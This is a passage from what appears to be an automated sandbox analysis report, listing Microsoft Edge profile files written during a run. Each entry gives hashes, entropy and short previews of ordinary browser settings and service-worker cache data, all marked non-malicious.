SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2ba3e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2cab8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b09a52ab-4c4f-4b0e-908e-7223cebf0ce7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9680
Entropy (8bit):	5.111007018216838
Encrypted:	false
SSDEEP:	192:stPkdpIsQbhIa34HkpyVq28YbV+FLxQA4Mq7NIkPEYJ:stPQIsQbhXDobGtQx/7NIE
MD5:	66563238EA15E450AF916F912AD92C3F
SHA1:	0483EE588011AE109390FB3A0C84999006C1897E
SHA-256:	002B6CC15590FC71D718DD7753D21D658A4ECCDE82AEAD164B87D387EF9DEB56
SHA-512:	4C515B0FCDD2776382EB6EF88BB50861CB9429C8C5C83D937CEAA3FC3E54DCD80BCD82CA30D3C3469607B56D401AB7F1F0CD8013BC36BC9C3476AE6E91390F5A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF30466.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9680
Entropy (8bit):	5.111007018216838
Encrypted:	false
SSDEEP:	192:stPkdpIsQbhIa34HkpyVq28YbV+FLxQA4Mq7NIkPEYJ:stPQIsQbhXDobGtQx/7NIE
MD5:	66563238EA15E450AF916F912AD92C3F
SHA1:	0483EE588011AE109390FB3A0C84999006C1897E
SHA-256:	002B6CC15590FC71D718DD7753D21D658A4ECCDE82AEAD164B87D387EF9DEB56
SHA-512:	4C515B0FCDD2776382EB6EF88BB50861CB9429C8C5C83D937CEAA3FC3E54DCD80BCD82CA30D3C3469607B56D401AB7F1F0CD8013BC36BC9C3476AE6E91390F5A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF34269.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9680
Entropy (8bit):	5.111007018216838
Encrypted:	false
SSDEEP:	192:stPkdpIsQbhIa34HkpyVq28YbV+FLxQA4Mq7NIkPEYJ:stPQIsQbhXDobGtQx/7NIE
MD5:	66563238EA15E450AF916F912AD92C3F
SHA1:	0483EE588011AE109390FB3A0C84999006C1897E
SHA-256:	002B6CC15590FC71D718DD7753D21D658A4ECCDE82AEAD164B87D387EF9DEB56
SHA-512:	4C515B0FCDD2776382EB6EF88BB50861CB9429C8C5C83D937CEAA3FC3E54DCD80BCD82CA30D3C3469607B56D401AB7F1F0CD8013BC36BC9C3476AE6E91390F5A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3b799.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9680
Entropy (8bit):	5.111007018216838
Encrypted:	false
SSDEEP:	192:stPkdpIsQbhIa34HkpyVq28YbV+FLxQA4Mq7NIkPEYJ:stPQIsQbhXDobGtQx/7NIE
MD5:	66563238EA15E450AF916F912AD92C3F
SHA1:	0483EE588011AE109390FB3A0C84999006C1897E
SHA-256:	002B6CC15590FC71D718DD7753D21D658A4ECCDE82AEAD164B87D387EF9DEB56
SHA-512:	4C515B0FCDD2776382EB6EF88BB50861CB9429C8C5C83D937CEAA3FC3E54DCD80BCD82CA30D3C3469607B56D401AB7F1F0CD8013BC36BC9C3476AE6E91390F5A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.556784044621286
Encrypted:	false
SSDEEP:	768:J0U6/g7pLGLP9gWPk2fJs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVcdl86rwFp8tuZ:J0U6/scP9gWPk2fJsu1jat38/It2
MD5:	A6C69A43BE59221F37A203CD5A2AE655
SHA1:	8172417E94BBE1F2C9EF5E78DECF93DF175E3B3D
SHA-256:	C47F9BAE7E146D63B40C48D7272F98A608F46BEBD5E72494A6F1C9A2EF623199
SHA-512:	B2E3CBCBD3A9A6757E1C8F9C3E3FEDBB54DEEF030028D14E6566FEEF622AA06D770B4837142C62465667129BF12B4AC9800FF7F1A3713E65A09F5B88545BFF2F
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377353271011156","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377353271011156","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF30476.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.556784044621286
Encrypted:	false
SSDEEP:	768:J0U6/g7pLGLP9gWPk2fJs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVcdl86rwFp8tuZ:J0U6/scP9gWPk2fJsu1jat38/It2
MD5:	A6C69A43BE59221F37A203CD5A2AE655
SHA1:	8172417E94BBE1F2C9EF5E78DECF93DF175E3B3D
SHA-256:	C47F9BAE7E146D63B40C48D7272F98A608F46BEBD5E72494A6F1C9A2EF623199
SHA-512:	B2E3CBCBD3A9A6757E1C8F9C3E3FEDBB54DEEF030028D14E6566FEEF622AA06D770B4837142C62465667129BF12B4AC9800FF7F1A3713E65A09F5B88545BFF2F
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377353271011156","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377353271011156","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF338d4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.556784044621286
Encrypted:	false
SSDEEP:	768:J0U6/g7pLGLP9gWPk2fJs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVcdl86rwFp8tuZ:J0U6/scP9gWPk2fJsu1jat38/It2
MD5:	A6C69A43BE59221F37A203CD5A2AE655
SHA1:	8172417E94BBE1F2C9EF5E78DECF93DF175E3B3D
SHA-256:	C47F9BAE7E146D63B40C48D7272F98A608F46BEBD5E72494A6F1C9A2EF623199
SHA-512:	B2E3CBCBD3A9A6757E1C8F9C3E3FEDBB54DEEF030028D14E6566FEEF622AA06D770B4837142C62465667129BF12B4AC9800FF7F1A3713E65A09F5B88545BFF2F
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377353271011156","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377353271011156","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.838523617796874
Encrypted:	false
SSDEEP:	24:F2xc5NmTCcncmo0CRORpllg2DMfRH2VdCRORpllg2Sc03osxYKCRORpllg2DPRHr:F2emTrtrdDMfB4XrdYx3rdDPBardoBN
MD5:	2C2259BE07F7B7DC4A474FD2781A7278
SHA1:	83CC7A36B6F0D971937B083F60BB297A41E732B4
SHA-256:	79743F5E7EEBB2F5F2D18DD6340B15E907BB76471A4EE8D8E5A59A1BF122720A
SHA-512:	4E6E46ABBB0F712623EF02C72F31DE604A0EE66911D0AA33B957918A93C7A4D30A67ED54A7BEE7944C319693FF9F1A52EA2F1A983CE72B2E8D2B24B1902E43EE
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2...4m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	297
Entropy (8bit):	5.236838096930744
Encrypted:	false
SSDEEP:	6:HM+wmIoM1CHhJ23oH+TcwtE/a252KLlVM+wmZjq2PCHhJ23oH+TcwtE/a2ZIFUv:sGIoAYeb8xLkGZjvBYeb8J2FUv
MD5:	D73EB3B8D4BD0AB0DDFBEC5AE5B7D744
SHA1:	67843DC228D83917C0A419A965B546073C3199E4
SHA-256:	48FA66A3E159B067F03E34D7E582B5CCA01AEA4D99F25C6A1EB7AB93CC962A02
SHA-512:	5EF58E4274BC5FFB2C6ECF23E47E215D76F360ADC46EEA27E286838033A12A3FD8E43D5A9A3412B324BDFCC5DCC09EA0C26A3F83C50159F052722B0B29A1BBA0
Malicious:	false
Preview:	2024/11/29-06:28:07.739 5f4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/29-06:28:07.753 5f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	114376
Entropy (8bit):	5.578974158147164
Encrypted:	false
SSDEEP:	1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKPt3dfvYg10:d9LyxPXfOxr1lMe1nL/CL/TXEmsvFu
MD5:	D45033D869E4288B5285CE484C1DE0A9
SHA1:	FF3AC0C20ED460976356DF8C8594704FAFEBFAEA
SHA-256:	67F4723C362FA1B8B007C3374C16C7B7905F70D0AF1A67F6BEEF2F6D9CC1A475
SHA-512:	3DC76520FE5F1723D1DB122CD195137142B739AD714713C34DA1385539CA0CDDCC0514DCDB5F6DCA7C88B38A234E9E47789B592A2BF016D65010E788CEABCCC7
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	188865
Entropy (8bit):	6.386945048671586
Encrypted:	false
SSDEEP:	3072:Ezr+zU9v2hvwzTnWPiL/J8OMIQBcPOrWRXUrN:zvwHW6L/+OfDPdkp
MD5:	E98A4EABF8643E4BA254475C00F90272
SHA1:	36D993AAEEB46BD4022AAD4D53816BADBEE69D09
SHA-256:	9C0BE23315B585EBA456E7577310C7EFD66754E95535BAC3B8970F154D5126F2
SHA-512:	E8EA144678E651BB79A94F514B305C9052DA4083F4F4F4DD2B708D1AC8A19DD6EBCE93AFD58F55523CC97CDA682D672DAE76122101E15205BFC0DC5D0FDB4D60
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;....x.h........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc6c......module....Rc...E....define....Rb.......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m..^..b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....zY...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.499372319564014
Encrypted:	false
SSDEEP:	3:o6Xl/ly/l9/lxE0tlla/lXp+n:oimO0gZ+
MD5:	53E2C5B7BA068E050B799E358180BC5A
SHA1:	9E9AC20E94F4A1970DEE97A7A215D89D658BCFF6
SHA-256:	28F0D14CA160497EEA7EC5ACE99778256D349C27C15F448CD84935D771955C66
SHA-512:	1C8FAB8221E12A813BDE164F2586EAA76F6C71CFE52F8C5007D34F39416BA03BF0A9B7F1FCC5B796604CC8B64C014FB2CD2C26AF1A1FCDDA8A3B598A93FC4A64
Malicious:	false
Preview:	@.....<'oy retne.........................X....,...................../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.499372319564014
Encrypted:	false
SSDEEP:	3:o6Xl/ly/l9/lxE0tlla/lXp+n:oimO0gZ+
MD5:	53E2C5B7BA068E050B799E358180BC5A
SHA1:	9E9AC20E94F4A1970DEE97A7A215D89D658BCFF6
SHA-256:	28F0D14CA160497EEA7EC5ACE99778256D349C27C15F448CD84935D771955C66
SHA-512:	1C8FAB8221E12A813BDE164F2586EAA76F6C71CFE52F8C5007D34F39416BA03BF0A9B7F1FCC5B796604CC8B64C014FB2CD2C26AF1A1FCDDA8A3B598A93FC4A64
Malicious:	false
Preview:	@.....<'oy retne.........................X....,...................../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF33a2c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.499372319564014
Encrypted:	false
SSDEEP:	3:o6Xl/ly/l9/lxE0tlla/lXp+n:oimO0gZ+
MD5:	53E2C5B7BA068E050B799E358180BC5A
SHA1:	9E9AC20E94F4A1970DEE97A7A215D89D658BCFF6
SHA-256:	28F0D14CA160497EEA7EC5ACE99778256D349C27C15F448CD84935D771955C66
SHA-512:	1C8FAB8221E12A813BDE164F2586EAA76F6C71CFE52F8C5007D34F39416BA03BF0A9B7F1FCC5B796604CC8B64C014FB2CD2C26AF1A1FCDDA8A3B598A93FC4A64
Malicious:	false
Preview:	@.....<'oy retne.........................X....,...................../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

